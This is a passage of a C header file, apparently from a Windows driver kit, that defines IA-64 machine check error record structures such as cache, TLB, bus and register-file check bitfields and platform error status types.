412 | // the Machine Check event.
413 | //
414 | // - Responder Identifier:
415 | // 64-bit integer specifying the bus agent that responded to a transaction responsible for
416 | // the Machine Check event.
417 | //
418 | // - Precise Instruction Pointer:
419 | // 64-bit integer specifying the virtual address that points to the IA-64 bundle that
420 | // contained the instruction responsible for the Machine Check event.
421 | //
422 |
423 | #define ERROR_PROCESSOR_GUID \
424 | { 0xe429faf1, 0x3cb7, 0x11d4, { 0xbc, 0xa7, 0x0, 0x80, 0xc7, 0x3c, 0x88, 0x81 }}
425 |
426 | typedef union _ERROR_MODINFO_VALID {
427 | ULONGLONG Valid;
428 | struct { // Bits
429 | ULONGLONG CheckInfo: 1; // 0:
430 | ULONGLONG RequestorIdentifier: 1; // 1:
431 | ULONGLONG ResponderIdentifier: 1; // 2:
432 | ULONGLONG TargetIdentifier: 1; // 3:
433 | ULONGLONG PreciseIP: 1; // 4:
434 | ULONGLONG Reserved: 59; // 5-63:
435 | } DUMMYSTRUCTNAME;
436 | } ERROR_MODINFO_VALID, *PERROR_MODINFO_VALID;
437 |
438 | typedef enum _ERROR_CHECK_IS {
439 | isIA64 = 0,
440 | isIA32 = 1,
441 | } ERROR_CHECK_IS;
442 |
443 | typedef enum _ERROR_CACHE_CHECK_OPERATION {
444 | CacheUnknownOp = 0,
445 | CacheLoad = 1,
446 | CacheStore = 2,
447 | CacheInstructionFetch = 3,
448 | CacheDataPrefetch = 4,
449 | CacheSnoop = 5,
450 | CacheCastOut = 6,
451 | CacheMoveIn = 7,
452 | } ERROR_CACHE_CHECK_OPERATION;
453 |
454 | typedef enum _ERROR_CACHE_CHECK_MESI {
455 | CacheInvalid = 0,
456 | CacheHeldShared = 1,
457 | CacheHeldExclusive = 2,
458 | CacheModified = 3,
459 | } ERROR_CACHE_CHECK_MESI;
460 |
461 | #if (NTDDI_VERSION >= NTDDI_VISTA)
462 | typedef union _ERROR_CACHE_CHECK {
463 | ULONGLONG CacheCheck;
464 | struct
465 | {
466 | ULONGLONG Operation:4; // bits 0- 3: Cache operation
467 | ULONGLONG Level:2; // 4- 5: Cache Level
468 | ULONGLONG Reserved1:2; // 6- 7
469 | ULONGLONG DataLine:1; // 8 : Failure data part of cache line
470 | ULONGLONG TagLine:1; // 9 : Failure tag part of cache line
471 | ULONGLONG DataCache:1; // 10 : Failure in data cache
472 | ULONGLONG InstructionCache:1; // 11 : Failure in instruction cache
473 | ULONGLONG MESI:3; // 12-14:
474 | ULONGLONG MESIValid:1; // 15 : MESI field is valid
475 | ULONGLONG Way:5; // 16-20: Failure in Way of Cache
476 | ULONGLONG WayIndexValid:1; // 21 : Way and Index fields valid
477 | ULONGLONG Reserved2:1; // 22
478 | ULONGLONG DP:1; // 23 : 1 - error due to data poisoning
479 | ULONGLONG Reserved3:8; // 24-31
480 | ULONGLONG Index:20; // 32-51: Index of cache line
481 | ULONGLONG Reserved4:2; // 52-53
482 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
483 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
484 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
485 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
486 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
487 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid
488 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid
489 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid
490 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
491 | } DUMMYSTRUCTNAME;
492 | } ERROR_CACHE_CHECK, *PERROR_CACHE_CHECK;
493 | # else
494 | typedef union _ERROR_CACHE_CHECK {
495 | ULONGLONG CacheCheck;
496 | struct
497 | {
498 | ULONGLONG Operation:4; // bits 0- 3: Cache operation
499 | ULONGLONG Level:2; // 4- 5: Cache Level
500 | ULONGLONG Reserved1:2; // 6- 7
501 | ULONGLONG DataLine:1; // 8 : Failure data part of cache line
502 | ULONGLONG TagLine:1; // 9 : Failure tag part of cache line
503 | ULONGLONG DataCache:1; // 10 : Failure in data cache
504 | ULONGLONG InstructionCache:1; // 11 : Failure in instruction cache
505 | ULONGLONG MESI:3; // 12-14:
506 | ULONGLONG MESIValid:1; // 15 : MESI field is valid
507 | ULONGLONG Way:5; // 16-20: Failure in Way of Cache
508 | ULONGLONG WayIndexValid:1; // 21 : Way and Index fields valid
509 | ULONGLONG Reserved2:10; // 22-31
510 | ULONGLONG Index:20; // 32-51: Index of cache line
511 | ULONGLONG Reserved3:2; // 52-53
512 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
513 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
514 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
515 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
516 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
517 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid
518 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid
519 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid
520 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
521 | } DUMMYSTRUCTNAME;
522 | } ERROR_CACHE_CHECK, *PERROR_CACHE_CHECK;
523 | #endif
524 |
525 | typedef enum _ERROR_TLB_CHECK_OPERATION {
526 | TlbUnknownOp = 0,
527 | TlbAccessWithLoad = 1,
528 | TlbAccessWithStore = 2,
529 | TlbAccessWithInstructionFetch = 3,
530 | TlbAccessWithDataPrefetch = 4,
531 | TlbShootDown = 5,
532 | TlbProbe = 6,
533 | TlbVhptFill = 7,
534 | TlbPurge = 8,
535 | } ERROR_TLB_CHECK_OPERATION;
536 |
537 | typedef union _ERROR_TLB_CHECK {
538 | ULONGLONG TlbCheck;
539 | struct
540 | {
541 | ULONGLONG TRSlot:8; // bits 0- 7: Slot number of Translation Register
542 | ULONGLONG TRSlotValid:1; // 8 : TRSlot field is valid
543 | ULONGLONG Reserved1:1; // 9
544 | ULONGLONG Level:2; // 10-11: TLB Level
545 | ULONGLONG Reserved2:4; // 12-15
546 | ULONGLONG DataTransReg:1; // 16 : Error in data translation register
547 | ULONGLONG InstructionTransReg:1; // 17 : Error in instruction translation register
548 | ULONGLONG DataTransCache:1; // 18 : Error in data translation cache
549 | ULONGLONG InstructionTransCache:1; // 19 : Error in instruction translation cache
550 | ULONGLONG Operation:4; // 20-23: Operation
551 | ULONGLONG Reserved3:30; // 24-53
552 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
553 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
554 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
555 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
556 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
557 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid
558 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid
559 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid
560 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
561 | } DUMMYSTRUCTNAME;
562 | } ERROR_TLB_CHECK, *PERROR_TLB_CHECK;
563 |
564 | typedef enum _ERROR_BUS_CHECK_OPERATION {
565 | BusUnknownOp = 0,
566 | BusPartialRead = 1,
567 | BusPartialWrite = 2,
568 | BusFullLineRead = 3,
569 | BusFullLineWrite = 4,
570 | BusWriteBack = 5,
571 | BusSnoopProbe = 6,
572 | BusIncomingPtcG = 7,
573 | BusWriteCoalescing = 8,
574 | } ERROR_BUS_CHECK_OPERATION;
575 |
576 | #if (NTDDI_VERSION >= NTDDI_VISTA)
577 | typedef union _ERROR_BUS_CHECK {
578 | ULONGLONG BusCheck;
579 | struct
580 | {
581 | ULONGLONG Size:5; // bits 0- 4: Transaction size
582 | ULONGLONG Internal:1; // 5 : Internal bus error
583 | ULONGLONG External:1; // 6 : External bus error
584 | ULONGLONG CacheTransfer:1; // 7 : Error occurred in Cache to Cache Transfer
585 | ULONGLONG Type:8; // 8-15: Transaction type
586 | ULONGLONG Severity:5; // 16-20: Error severity - platform specific
587 | ULONGLONG Hierarchy:2; // 21-22: Level or Bus hierarchy
588 | ULONGLONG DP:1; // 23 : 1 - error due to data poisoning
589 | ULONGLONG Status:8; // 24-31: Bus error status - processor bus specific
590 | ULONGLONG Reserved1:22; // 32-53
591 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
592 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
593 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
594 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
595 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
596 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid
597 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid
598 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid
599 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
600 | } DUMMYSTRUCTNAME;
601 | } ERROR_BUS_CHECK, *PERROR_BUS_CHECK;
602 | #else
603 | typedef union _ERROR_BUS_CHECK {
604 | ULONGLONG BusCheck;
605 | struct
606 | {
607 | ULONGLONG Size:5; // bits 0- 4: Transaction size
608 | ULONGLONG Internal:1; // 5 : Internal bus error
609 | ULONGLONG External:1; // 6 : External bus error
610 | ULONGLONG CacheTransfer:1; // 7 : Error occurred in Cache to Cache Transfer
611 | ULONGLONG Type:8; // 8-15: Transaction type
612 | ULONGLONG Severity:5; // 16-20: Error severity - platform specific
613 | ULONGLONG Hierarchy:2; // 21-22: Level or Bus hierarchy
614 | ULONGLONG Reserved1:1; // 23
615 | ULONGLONG Status:8; // 24-31: Bus error status - processor bus specific
616 | ULONGLONG Reserved2:22; // 32-53
617 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
618 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
619 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
620 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
621 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
622 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid
623 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid
624 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid
625 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
626 | } DUMMYSTRUCTNAME;
627 | } ERROR_BUS_CHECK, *PERROR_BUS_CHECK;
628 | #endif
629 |
630 | typedef enum _ERROR_REGFILE_CHECK_IDENTIFIER {
631 | RegFileUnknownId = 0,
632 | GeneralRegisterBank1 = 1,
633 | GeneralRegisterBank0 = 2,
634 | FloatingPointRegister = 3,
635 | BranchRegister = 4,
636 | PredicateRegister = 5,
637 | ApplicationRegister = 6,
638 | ControlRegister = 7,
639 | RegionRegister = 8,
640 | ProtectionKeyRegister = 9,
641 | DataBreakPointRegister = 10,
642 | InstructionBreakPointRegister = 11,
643 | PerformanceMonitorControlRegister = 12,
644 | PerformanceMonitorDataRegister = 13,
645 | } ERROR_REGFILE_CHECK_IDENTIFIER;
646 |
647 | typedef enum _ERROR_REGFILE_CHECK_OPERATION {
648 | RegFileUnknownOp = 0,
649 | RegFileRead = 1,
650 | RegFileWrite = 2,
651 | } ERROR_REGFILE_CHECK_OPERATION;
652 |
653 | typedef union _ERROR_REGFILE_CHECK {
654 | ULONGLONG RegFileCheck;
655 | struct
656 | {
657 | ULONGLONG Identifier:4; // bits 0- 3: Register file identifier
658 | ULONGLONG Operation:4; // 4- 7: Operation that causes the MC event
659 | ULONGLONG RegisterNumber:7; // 8-14: Register number responsible for MC event
660 | ULONGLONG RegisterNumberValid:1; // 15 : Register number field is valid
661 | ULONGLONG Reserved1:38; // 16-53
662 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
663 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
664 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
665 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
666 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
667 | ULONGLONG Reserved2:3; // 60-62
668 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
669 | } DUMMYSTRUCTNAME;
670 | } ERROR_REGFILE_CHECK, *PERROR_REGFILE_CHECK;
671 |
672 | #if (NTDDK_VERSION <= WINXP)
673 | typedef enum _ERROR_MS_CHECK_OPERATION {
674 | MsUnknownOp = 0,
675 | MsReadOrLoad = 1,
676 | MsWriteOrStore = 2
677 | } ERROR_MS_CHECK_OPERATION;
678 | #else
679 | typedef enum _ERROR_MS_CHECK_OPERATION {
680 | MsUnknownOp = 0,
681 | MsReadOrLoad = 1,
682 | MsWriteOrStore = 2,
683 | MsOverTemperature = 3,
684 | MsNormalTemperature = 4
685 | } ERROR_MS_CHECK_OPERATION;
686 | #endif
687 |
688 | typedef union _ERROR_MS_CHECK {
689 | ULONGLONG MsCheck;
690 | struct
691 | {
692 | ULONGLONG StructureIdentifier:5; // bits 0- 4: Structure Identifier - impl. specific
693 | ULONGLONG Level:3; // 5- 7: Structure Level where error was generated
694 | ULONGLONG ArrayId:4; // 8-11: Identification of the array
695 | ULONGLONG Operation:4; // 12-15: Operation
696 | ULONGLONG Way:6; // 16-21: Way where the error was located
697 | ULONGLONG WayValid:1; // 22 : Way field is valid
698 | ULONGLONG IndexValid:1; // 23 : Index field is valid
699 | ULONGLONG Reserved1:8; // 24-31
700 | ULONGLONG Index:8; // 32-39: Index where the error was located
701 | ULONGLONG Reserved2:14; // 40-53
702 | ULONGLONG InstructionSet:1; // 54 : 0 - IA64 instruction, 1- IA32 instruction
703 | ULONGLONG InstructionSetValid:1; // 55 : InstructionSet field is valid
704 | ULONGLONG PrivilegeLevel:2; // 56-57: Privilege level of instruction
705 | ULONGLONG PrivilegeLevelValid:1; // 58 : PrivilegeLevel field is Valid
706 | ULONGLONG MachineCheckCorrected:1; // 59 : 1 - Machine Check Corrected
707 | ULONGLONG TargetAddressValid:1; // 60 : Target Address is valid
708 | ULONGLONG RequestIdValid:1; // 61 : RequestId is valid
709 | ULONGLONG ResponderIdValid:1; // 62 : ResponderId is valid
710 | ULONGLONG PreciseIPValid:1; // 63 : Precise Instruction Pointer is Valid
711 | } DUMMYSTRUCTNAME;
712 | } ERROR_MS_CHECK, *PERROR_MS_CHECK;
713 |
714 | typedef union _ERROR_CHECK_INFO {
715 | ULONGLONG CheckInfo;
716 | ERROR_CACHE_CHECK CacheCheck;
717 | ERROR_TLB_CHECK TlbCheck;
718 | ERROR_BUS_CHECK BusCheck;
719 | ERROR_REGFILE_CHECK RegFileCheck;
720 | ERROR_MS_CHECK MsCheck;
721 | } ERROR_CHECK_INFO, *PERROR_CHECK_INFO;
722 |
723 | // SAL Specs July 2000: The size of _ERROR_MODINFO will always be 48 Bytes.
724 |
725 | typedef struct _ERROR_MODINFO {
726 | ERROR_MODINFO_VALID Valid;
727 | ERROR_CHECK_INFO CheckInfo;
728 | ULONGLONG RequestorId;
729 | ULONGLONG ResponderId;
730 | ULONGLONG TargetId;
731 | ULONGLONG PreciseIP;
732 | } ERROR_MODINFO, *PERROR_MODINFO;
733 |
734 | typedef union _ERROR_PROCESSOR_VALID {
735 | ULONGLONG Valid;
736 | struct { // Bits
737 | ULONGLONG ErrorMap: 1; // 0:
738 | ULONGLONG StateParameter: 1; // 1:
739 | ULONGLONG CRLid: 1; // 2:
740 | ULONGLONG StaticStruct:1; // 3: Processor Static Info error.
741 | ULONGLONG CacheCheckNum:4; // 4-7: Cache errors.
742 | ULONGLONG TlbCheckNum:4; // 8-11: Tlb errors.
743 | ULONGLONG BusCheckNum:4; // 12-15: Bus errors.
744 | ULONGLONG RegFileCheckNum:4; // 16-19: Registers file errors.
745 | ULONGLONG MsCheckNum:4; // 20-23: Micro-Architecture errors.
746 | ULONGLONG CpuIdInfo:1; // 24: CPUID Info.
747 | ULONGLONG Reserved:39; // 25-63: Reserved.
748 | } DUMMYSTRUCTNAME;
749 | } ERROR_PROCESSOR_VALID, *PERROR_PROCESSOR_VALID;
750 |
751 | typedef union _ERROR_PROCESSOR_ERROR_MAP {
752 | ULONGLONG ErrorMap;
753 | struct {
754 | ULONGLONG Cid:4; // bits 0- 3: Processor Core Identifier
755 | ULONGLONG Tid:4; // 4- 7: Logical Thread Identifier
756 | ULONGLONG Eic:4; // 8-11: Instruction Caches Level Information
757 | ULONGLONG Edc:4; // 12-15: Data Caches Level Information
758 | ULONGLONG Eit:4; // 16-19: Instruction TLB Level Information
759 | ULONGLONG Edt:4; // 20-23: Data TLB Level Information
760 | ULONGLONG Ebh:4; // 24-27: Processor Bus Level Information
761 | ULONGLONG Erf:4; // 28-31: Register File Level Information
762 | ULONGLONG Ems:16; // 32-47: MicroArchitecture Level Information
763 | ULONGLONG Reserved:16;
764 | } DUMMYSTRUCTNAME;
765 | } ERROR_PROCESSOR_ERROR_MAP, *PERROR_PROCESSOR_ERROR_MAP;
766 |
767 | typedef ERROR_PROCESSOR_ERROR_MAP _ERROR_PROCESSOR_LEVEL_INDEX;
768 | typedef _ERROR_PROCESSOR_LEVEL_INDEX ERROR_PROCESSOR_LEVEL_INDEX, *PERROR_PROCESSOR_LEVEL_INDEX;
769 |
770 | typedef union _ERROR_PROCESSOR_STATE_PARAMETER {
771 | ULONGLONG StateParameter;
772 | struct {
773 | ULONGLONG reserved0:2; // 0-1 : reserved
774 | ULONGLONG rz:1; // 2 : Rendezvous successful
775 | ULONGLONG ra:1; // 3 : Rendezvous attempted
776 | ULONGLONG me:1; // 4 : Distinct Multiple errors
777 | ULONGLONG mn:1; // 5 : Min-state Save Area registered
778 | ULONGLONG sy:1; // 6 : Storage integrity synchronized
779 | ULONGLONG co:1; // 7 : Continuable
780 | ULONGLONG ci:1; // 8 : Machine Check isolated
781 | ULONGLONG us:1; // 9 : Uncontained Storage damage
782 | ULONGLONG hd:1; // 10 : Hardware damage
783 | ULONGLONG tl:1; // 11 : Trap lost
784 | ULONGLONG mi:1; // 12 : More Information
785 | ULONGLONG pi:1; // 13 : Precise Instruction pointer
786 | ULONGLONG pm:1; // 14 : Precise Min-state Save Area
787 | ULONGLONG dy:1; // 15 : Processor Dynamic State valid
788 | ULONGLONG in:1; // 16 : INIT interruption
789 | ULONGLONG rs:1; // 17 : RSE valid
790 | ULONGLONG cm:1; // 18 : Machine Check corrected
791 | ULONGLONG ex:1; // 19 : Machine Check expected
792 | ULONGLONG cr:1; // 20 : Control Registers valid
793 | ULONGLONG pc:1; // 21 : Performance Counters valid
794 | ULONGLONG dr:1; // 22 : Debug Registers valid
795 | ULONGLONG tr:1; // 23 : Translation Registers valid
796 | ULONGLONG rr:1; // 24 : Region Registers valid
797 | ULONGLONG ar:1; // 25 : Application Registers valid
798 | ULONGLONG br:1; // 26 : Branch Registers valid
799 | ULONGLONG pr:1; // 27 : Predicate Registers valid
800 | ULONGLONG fp:1; // 28 : Floating-Point Registers valid
801 | ULONGLONG b1:1; // 29 : Preserved Bank 1 General Registers valid
802 | ULONGLONG b0:1; // 30 : Preserved Bank 0 General Registers valid
803 | ULONGLONG gr:1; // 31 : General Registers valid
804 | ULONGLONG dsize:16; // 47-32 : Processor Dynamic State size
805 | ULONGLONG reserved1:11; // 48-58 : reserved
806 | ULONGLONG cc:1; // 59 : Cache Check
807 | ULONGLONG tc:1; // 60 : TLB Check
808 | ULONGLONG bc:1; // 61 : Bus Check
809 | ULONGLONG rc:1; // 62 : Register File Check
810 | ULONGLONG uc:1; // 63 : Micro-Architectural Check
811 | } DUMMYSTRUCTNAME;
812 | } ERROR_PROCESSOR_STATE_PARAMETER, *PERROR_PROCESSOR_STATE_PARAMETER;
813 |
814 | typedef union _PROCESSOR_LOCAL_ID {
815 | ULONGLONG LocalId;
816 | struct {
817 | ULONGLONG reserved:16; // 0-16 : reserved
818 | ULONGLONG eid:8; // 16-23 : Extended Id
819 | ULONGLONG id:8; // 24-31 : Id
820 | ULONGLONG ignored:32; // 32-63 : ignored
821 | } DUMMYSTRUCTNAME;
822 | } PROCESSOR_LOCAL_ID, *PPROCESSOR_LOCAL_ID;
823 |
824 | typedef struct _ERROR_PROCESSOR_MS {
825 | ULONGLONG MsError [ /* Valid.MsCheckNum */ 1]; // 0 -> 15 registers file errors.
826 | } ERROR_PROCESSOR_MS, *PERROR_PROCESSOR_MS;
827 |
828 | typedef struct _ERROR_PROCESSOR_CPUID_INFO { // Must be 48 bytes.
829 | ULONGLONG CpuId0;
830 | ULONGLONG CpuId1;
831 | ULONGLONG CpuId2;
832 | ULONGLONG CpuId3;
833 | ULONGLONG CpuId4;
834 | ULONGLONG Reserved;
835 | } ERROR_PROCESSOR_CPUID_INFO, *PERROR_PROCESSOR_CPUID_INFO;
836 |
837 | typedef union _ERROR_PROCESSOR_STATIC_INFO_VALID {
838 | ULONGLONG Valid;
839 | struct { // Bits
840 | // Warning: Match the VALID fields with the _ERROR_PROCESSOR_STATIC_INFO members.
841 | // KD extensions use the field names to access the PSI structure.
842 | ULONGLONG MinState: 1; // 0: MinState valid.
843 | ULONGLONG BR: 1; // 1: Branch Registers valid.
844 | ULONGLONG CR: 1; // 2: Control Registers valid.
845 | ULONGLONG AR: 1; // 3: Application Registers valid.
846 | ULONGLONG RR: 1; // 4: Registers valid.
847 | ULONGLONG FR: 1; // 5: Registers valid.
848 | ULONGLONG Reserved: 58; // 6-63: Reserved.
849 | } DUMMYSTRUCTNAME;
850 | } ERROR_PROCESSOR_STATIC_INFO_VALID, *PERROR_PROCESSOR_STATIC_INFO_VALID;
851 |
852 | typedef struct _ERROR_PROCESSOR_STATIC_INFO {
853 | ERROR_PROCESSOR_STATIC_INFO_VALID Valid;
854 | UCHAR MinState[ /* SAL Specs, July 2000 and Jan 2001 state approximatively: */ 1024];
855 | ULONGLONG BR [ 8 ];
856 | ULONGLONG CR [ /* SAL Specs, July 2000 states that it is processor dependent */ 128 ];
857 | ULONGLONG AR [ /* SAL Specs, July 2000 states that it is processor dependent */ 128 ];
858 | ULONGLONG RR [ 8 ];
859 | ULONGLONG FR [ 2 * 128 ];
860 | } ERROR_PROCESSOR_STATIC_INFO, *PERROR_PROCESSOR_STATIC_INFO;
861 |
862 | typedef struct _ERROR_PROCESSOR {
863 | ERROR_SECTION_HEADER Header;
864 | ERROR_PROCESSOR_VALID Valid;
865 | ERROR_PROCESSOR_ERROR_MAP ErrorMap;
866 | ERROR_PROCESSOR_STATE_PARAMETER StateParameter;
867 | PROCESSOR_LOCAL_ID CRLid;
868 | #if 0
869 | // The presence of the following data depends on the valid bits
870 | // from ERROR_PROCESSOR.Valid.
871 | //
872 | ERROR_MODINFO CacheErrorInfo [ /* Valid.CacheCheckNum */ ]; // 0->15 cache error modinfo structs.
873 | ERROR_MODINFO TlbErrorInfo [ /* Valid.TlbCheckNum */ ]; // 0->15 tlb error modinfo structs.
874 | ERROR_MODINFO BusErrorInfo [ /* Valid.BusCheckNum */ ]; // 0->15 bus error modinfo structs.
875 | ERROR_MODINFO RegFileCheckInfo [ /* Valid.RegFileCheckNum */ ]; // 0->15 registers file errors.
876 | ERROR_MODINFO MsCheckInfo [ /* Valid.MsCheckNum */ ]; // 0->15 registers file errors.
877 | ERROR_PROCESSOR_CPUID_INFO CpuIdInfo; // field will always be there but could be zero-padded.
878 | ERROR_PROCESSOR_STATIC_INFO StaticInfo; // field will always be there but could be zero-padded.
879 | #endif // 0
880 | } ERROR_PROCESSOR, *PERROR_PROCESSOR;
881 |
882 | //
883 | // IA64 ERROR PROCESSOR State Parameter - GR18 - definitions.
884 | //
885 |
886 | #define ERROR_PROCESSOR_STATE_PARAMETER_CACHE_CHECK_SHIFT 59
887 | #define ERROR_PROCESSOR_STATE_PARAMETER_CACHE_CHECK_MASK 0x1
888 | #define ERROR_PROCESSOR_STATE_PARAMETER_TLB_CHECK_SHIFT 60
889 | #define ERROR_PROCESSOR_STATE_PARAMETER_TLB_CHECK_MASK 0x1
890 | #define ERROR_PROCESSOR_STATE_PARAMETER_BUS_CHECK_SHIFT 61
891 | #define ERROR_PROCESSOR_STATE_PARAMETER_BUS_CHECK_MASK 0x1
892 | #define ERROR_PROCESSOR_STATE_PARAMETER_REG_CHECK_SHIFT 62
893 | #define ERROR_PROCESSOR_STATE_PARAMETER_REG_CHECK_MASK 0x1
894 | #define ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_SHIFT 63
895 | #define ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_MASK 0x1
896 |
897 | //
898 | // For legacy consumers
899 | //
900 | #define ERROR_PROCESSOR_STATE_PARAMETER_UNKNOWN_CHECK_SHIFT ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_SHIFT
901 | #define ERROR_PROCESSOR_STATE_PARAMETER_UNKNOWN_CHECK_MASK ERROR_PROCESSOR_STATE_PARAMETER_MICROARCH_CHECK_MASK
902 |
903 | ////////////////////////////////////////////////////////////////////
904 | //
905 | // IA64 PLATFORM ERRORS Definitions
906 | //
907 | // We tried to respect the order in which these error devices are
908 | // presented in the SAL specs.
909 |
910 | //
911 | // IA64 ERRORS: _ERR_TYPE definitions
912 | //
913 | // Warning 04/01/01: "ERR_TYPE" or "ERROR_TYPE" are already used in the NT namespace.
914 | //
915 |
916 | typedef enum _ERR_TYPES {
917 | // Generic error types:
918 | ERR_INTERNAL = 1, // Error detected internal to the component
919 | ERR_BUS = 16, // Error detected in the bus
920 | // Detailed Internal Error Types:
921 | ERR_MEM = 4, // Storage error in memory (DRAM)
922 | ERR_TLB = 5, // Storage error in TLB
923 | ERR_CACHE = 6, // Storage error in cache
924 | ERR_FUNCTION = 7, // Error in one or more functional units
925 | ERR_SELFTEST = 8, // Component failed self test
926 | ERR_FLOW = 9, // Overflow or Undervalue of internal queue
927 | // Detailed Bus Error Types:
928 | ERR_MAP = 17, // Virtual address not found on IO-TLB or IO-PDIR
929 | ERR_IMPROPER = 18, // Improper access error
930 | ERR_UNIMPL = 19, // Access to a memory address which is not mapped to any component
931 | ERR_LOL = 20, // Loss Of Lockstep
932 | ERR_RESPONSE = 21, // Response to which there is no associated request
933 | ERR_PARITY = 22, // Bus parity error
934 | ERR_PROTOCOL = 23, // Detection of a protocol error
935 | ERR_ERROR = 24, // Detection of PATH_ERROR
936 | ERR_TIMEOUT = 25, // Bus operation time-out
937 | ERR_POISONED = 26, // A read was issued to data which has been poisoned
938 | } _ERR_TYPE;
939 |
940 | //
941 | // IA64 ERRORS: ERROR_STATUS definitions
942 | //
943 |
944 | typedef union _ERROR_STATUS {
945 | ULONGLONG Status;
946 | struct { // Bits:
947 | ULONGLONG Reserved0:8; // 7-0: Reserved
948 | ULONGLONG Type:8; // 15-8: Error Type - See _ERR_TYPE definitions.
949 | ULONGLONG Address:1; // 16: Error was detected on address signals or on address portion of transaction
950 | ULONGLONG Control:1; // 17: Error was detected on control signals or in control portion of transaction
951 | ULONGLONG Data:1; // 18: Error was detected on data signals or in data portion of transaction
952 | ULONGLONG Responder:1; // 19: Error was detected by responder of transaction
953 | ULONGLONG Requestor:1; // 20: Error was detected by requester of transaction
954 | ULONGLONG FirstError:1; // 21: If multiple errors, this is the first error of the highest severity that occurred
955 | ULONGLONG Overflow:1; // 22: Additional errors occurred which were not logged because registers overflow
956 | ULONGLONG Reserved1:41; // 63-23: Reserved
957 | } DUMMYSTRUCTNAME;
958 | } ERROR_STATUS, *PERROR_STATUS;
959 |
960 | //
961 | // IA64 ERRORS: Platform OEM_DATA definitions
962 | //
963 |
964 | typedef struct _ERROR_OEM_DATA {
965 | USHORT Length;
966 | #if 0
967 | UCHAR Data[/* ERROR_OEM_DATA.Length */];
968 | #endif // 0
969 | } ERROR_OEM_DATA, *PERROR_OEM_DATA;
970 |
971 | //
972 | // IA64 ERRORS: Platform BUS_SPECIFIC_DATA definitions
973 | //
974 |
975 | typedef union _ERROR_BUS_SPECIFIC_DATA {
976 | ULONGLONG BusSpecificData;
977 | struct { // Bits :
978 | ULONGLONG LockAsserted:1; // 0: LOCK# Asserted during request phase
979 | ULONGLONG DeferLogged:1; // 1: Defer phase is logged
980 | ULONGLONG IOQEmpty:1; // 2: IOQ is empty
981 | ULONGLONG DeferredTransaction:1; // 3: Component interface deferred transaction
982 | ULONGLONG RetriedTransaction:1; // 4: Component interface retried transaction
983 | ULONGLONG MemoryClaimedTransaction:1; // 5: memory claimed the transaction
984 | ULONGLONG IOClaimedTransaction:1; // 6: IO controller claimed the transaction
985 | ULONGLONG ResponseParitySignal:1; // 7: Response parity signal
986 | ULONGLONG DeferSignal:1; // 8: DEFER# signal
987 | ULONGLONG HitMSignal:1; // 9: HITM# signal
988 | ULONGLONG HitSignal:1; // 10: HIT# signal
989 | ULONGLONG RequestBusFirstCycle:6; // 16-11: First cycle of request bus
990 | ULONGLONG RequestBusSecondCycle:6; // 22-17: Second cycle of request bus
991 | ULONGLONG AddressParityBusFirstCycle:2; // 24-23: First cycle of address parity bus
992 | ULONGLONG AddressParityBusSecondCycle:2; // 26-25: Second cycle of address parity
